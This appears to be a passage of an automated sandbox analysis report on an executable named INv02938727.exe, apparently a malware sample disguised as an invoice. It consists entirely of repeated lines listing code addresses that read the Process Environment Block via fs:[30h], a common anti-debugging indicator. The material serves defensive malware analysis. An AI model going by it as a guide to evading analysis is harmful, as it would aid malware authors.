Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]	2_2_012820A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0128F0BF
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128F0BF mov eax, dword ptr fs:[00000030h]	2_2_0128F0BF
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128F0BF mov eax, dword ptr fs:[00000030h]	2_2_0128F0BF
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259080 mov eax, dword ptr fs:[00000030h]	2_2_01259080
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D3884 mov eax, dword ptr fs:[00000030h]	2_2_012D3884
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D3884 mov eax, dword ptr fs:[00000030h]	2_2_012D3884
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]	2_2_012540E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]	2_2_012540E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]	2_2_012540E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012558EC mov eax, dword ptr fs:[00000030h]	2_2_012558EC
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_012EB8D0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131131B mov eax, dword ptr fs:[00000030h]	2_2_0131131B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0125DB60
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01283B7A mov eax, dword ptr fs:[00000030h]	2_2_01283B7A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01283B7A mov eax, dword ptr fs:[00000030h]	2_2_01283B7A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125DB40 mov eax, dword ptr fs:[00000030h]	2_2_0125DB40
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328B58 mov eax, dword ptr fs:[00000030h]	2_2_01328B58
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125F358 mov eax, dword ptr fs:[00000030h]	2_2_0125F358
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]	2_2_01284BAD
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]	2_2_01284BAD
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]	2_2_01284BAD
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01325BA5 mov eax, dword ptr fs:[00000030h]	2_2_01325BA5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01261B8F mov eax, dword ptr fs:[00000030h]	2_2_01261B8F
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01261B8F mov eax, dword ptr fs:[00000030h]	2_2_01261B8F
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130D380 mov ecx, dword ptr fs:[00000030h]	2_2_0130D380
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128B390 mov eax, dword ptr fs:[00000030h]	2_2_0128B390
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131138A mov eax, dword ptr fs:[00000030h]	2_2_0131138A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282397 mov eax, dword ptr fs:[00000030h]	2_2_01282397
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]	2_2_012803E2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127DBE9 mov eax, dword ptr fs:[00000030h]	2_2_0127DBE9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D53CA mov eax, dword ptr fs:[00000030h]	2_2_012D53CA
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D53CA mov eax, dword ptr fs:[00000030h]	2_2_012D53CA
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01294A2C mov eax, dword ptr fs:[00000030h]	2_2_01294A2C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01294A2C mov eax, dword ptr fs:[00000030h]	2_2_01294A2C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]	2_2_0131AA16
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]	2_2_0131AA16
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01268A0A mov eax, dword ptr fs:[00000030h]	2_2_01268A0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125AA16 mov eax, dword ptr fs:[00000030h]	2_2_0125AA16
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125AA16 mov eax, dword ptr fs:[00000030h]	2_2_0125AA16
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]	2_2_01255210
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01255210 mov ecx, dword ptr fs:[00000030h]	2_2_01255210
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]	2_2_01255210
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]	2_2_01255210
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01273A1C mov eax, dword ptr fs:[00000030h]	2_2_01273A1C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130B260 mov eax, dword ptr fs:[00000030h]	2_2_0130B260
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130B260 mov eax, dword ptr fs:[00000030h]	2_2_0130B260
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328A62 mov eax, dword ptr fs:[00000030h]	2_2_01328A62
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0129927A mov eax, dword ptr fs:[00000030h]	2_2_0129927A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131EA55 mov eax, dword ptr fs:[00000030h]	2_2_0131EA55
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]	2_2_01259240
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]	2_2_01259240
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]	2_2_01259240
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]	2_2_01259240
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012E4257 mov eax, dword ptr fs:[00000030h]	2_2_012E4257
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]	2_2_012552A5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]	2_2_012552A5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]	2_2_012552A5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]	2_2_012552A5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]	2_2_012552A5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0126AAB0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0126AAB0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0128FAB0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128D294 mov eax, dword ptr fs:[00000030h]	2_2_0128D294
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128D294 mov eax, dword ptr fs:[00000030h]	2_2_0128D294
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282AE4 mov eax, dword ptr fs:[00000030h]	2_2_01282AE4
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282ACB mov eax, dword ptr fs:[00000030h]	2_2_01282ACB
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328D34 mov eax, dword ptr fs:[00000030h]	2_2_01328D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131E539 mov eax, dword ptr fs:[00000030h]	2_2_0131E539
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]	2_2_01263D34
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]	2_2_01284D3B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]	2_2_01284D3B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]	2_2_01284D3B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125AD30 mov eax, dword ptr fs:[00000030h]	2_2_0125AD30
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012DA537 mov eax, dword ptr fs:[00000030h]	2_2_012DA537
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127C577 mov eax, dword ptr fs:[00000030h]	2_2_0127C577
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127C577 mov eax, dword ptr fs:[00000030h]	2_2_0127C577
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01293D43 mov eax, dword ptr fs:[00000030h]	2_2_01293D43
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D3540 mov eax, dword ptr fs:[00000030h]	2_2_012D3540
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01303D40 mov eax, dword ptr fs:[00000030h]	2_2_01303D40
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01277D50 mov eax, dword ptr fs:[00000030h]	2_2_01277D50
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012835A1 mov eax, dword ptr fs:[00000030h]	2_2_012835A1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]	2_2_01281DB5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]	2_2_01281DB5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]	2_2_01281DB5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013205AC mov eax, dword ptr fs:[00000030h]	2_2_013205AC
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013205AC mov eax, dword ptr fs:[00000030h]	2_2_013205AC
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]	2_2_01282581
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]	2_2_01282581
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]	2_2_01282581
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]	2_2_01282581
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]	2_2_01252D8A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]	2_2_01252D8A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]	2_2_01252D8A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]	2_2_01252D8A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]	2_2_01252D8A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128FD9B mov eax, dword ptr fs:[00000030h]	2_2_0128FD9B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128FD9B mov eax, dword ptr fs:[00000030h]	2_2_0128FD9B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01308DF1 mov eax, dword ptr fs:[00000030h]	2_2_01308DF1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0126D5E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0126D5E0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0131FDE2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0131FDE2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0131FDE2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0131FDE2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov ecx, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012D6DC9
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128BC2C mov eax, dword ptr fs:[00000030h]	2_2_0128BC2C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]	2_2_012D6C0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]	2_2_012D6C0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]	2_2_012D6C0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6C0A mov eax, dword ptr fs:[00000030h]	2_2_012D6C0A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311C06 mov eax, dword ptr fs:[00000030h]	2_2_01311C06
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]	2_2_0132740D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]	2_2_0132740D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132740D mov eax, dword ptr fs:[00000030h]	2_2_0132740D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127746D mov eax, dword ptr fs:[00000030h]	2_2_0127746D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A44B mov eax, dword ptr fs:[00000030h]	2_2_0128A44B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EC450 mov eax, dword ptr fs:[00000030h]	2_2_012EC450
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EC450 mov eax, dword ptr fs:[00000030h]	2_2_012EC450
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126849B mov eax, dword ptr fs:[00000030h]	2_2_0126849B
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013114FB mov eax, dword ptr fs:[00000030h]	2_2_013114FB
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012D6CF0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012D6CF0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012D6CF0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328CD6 mov eax, dword ptr fs:[00000030h]	2_2_01328CD6
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01254F2E mov eax, dword ptr fs:[00000030h]	2_2_01254F2E
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01254F2E mov eax, dword ptr fs:[00000030h]	2_2_01254F2E
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128E730 mov eax, dword ptr fs:[00000030h]	2_2_0128E730
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A70E mov eax, dword ptr fs:[00000030h]	2_2_0128A70E
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A70E mov eax, dword ptr fs:[00000030h]	2_2_0128A70E
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127F716 mov eax, dword ptr fs:[00000030h]	2_2_0127F716
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EFF10 mov eax, dword ptr fs:[00000030h]	2_2_012EFF10
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EFF10 mov eax, dword ptr fs:[00000030h]	2_2_012EFF10
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132070D mov eax, dword ptr fs:[00000030h]	2_2_0132070D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0132070D mov eax, dword ptr fs:[00000030h]	2_2_0132070D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126FF60 mov eax, dword ptr fs:[00000030h]	2_2_0126FF60
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01328F6A mov eax, dword ptr fs:[00000030h]	2_2_01328F6A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126EF40 mov eax, dword ptr fs:[00000030h]	2_2_0126EF40
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01268794 mov eax, dword ptr fs:[00000030h]	2_2_01268794
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]	2_2_012D7794
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]	2_2_012D7794
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7794 mov eax, dword ptr fs:[00000030h]	2_2_012D7794
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012937F5 mov eax, dword ptr fs:[00000030h]	2_2_012937F5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125E620 mov eax, dword ptr fs:[00000030h]	2_2_0125E620
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0130FE3F mov eax, dword ptr fs:[00000030h]	2_2_0130FE3F
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]	2_2_0125C600
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]	2_2_0125C600
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125C600 mov eax, dword ptr fs:[00000030h]	2_2_0125C600
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01288E00 mov eax, dword ptr fs:[00000030h]	2_2_01288E00
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A61C mov eax, dword ptr fs:[00000030h]	2_2_0128A61C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A61C mov eax, dword ptr fs:[00000030h]	2_2_0128A61C
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01311608 mov eax, dword ptr fs:[00000030h]	2_2_01311608
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126766D mov eax, dword ptr fs:[00000030h]	2_2_0126766D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]	2_2_0127AE73
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]	2_2_0127AE73
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]	2_2_0127AE73
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]	2_2_0127AE73
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127AE73 mov eax, dword ptr fs:[00000030h]	2_2_0127AE73
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01267E41 mov eax, dword ptr fs:[00000030h]	2_2_01267E41
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131AE44 mov eax, dword ptr fs:[00000030h]	2_2_0131AE44
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0131AE44 mov eax, dword ptr fs:[00000030h]	2_2_0131AE44
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D46A7 mov eax, dword ptr fs:[00000030h]	2_2_012D46A7
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]	2_2_01320EA5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]	2_2_01320EA5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01320EA5 mov eax, dword ptr fs:[00000030h]	2_2_01320EA5
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012EFE87 mov eax, dword ptr fs:[00000030h]	2_2_012EFE87
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012676E2 mov eax, dword ptr fs:[00000030h]	2_2_012676E2
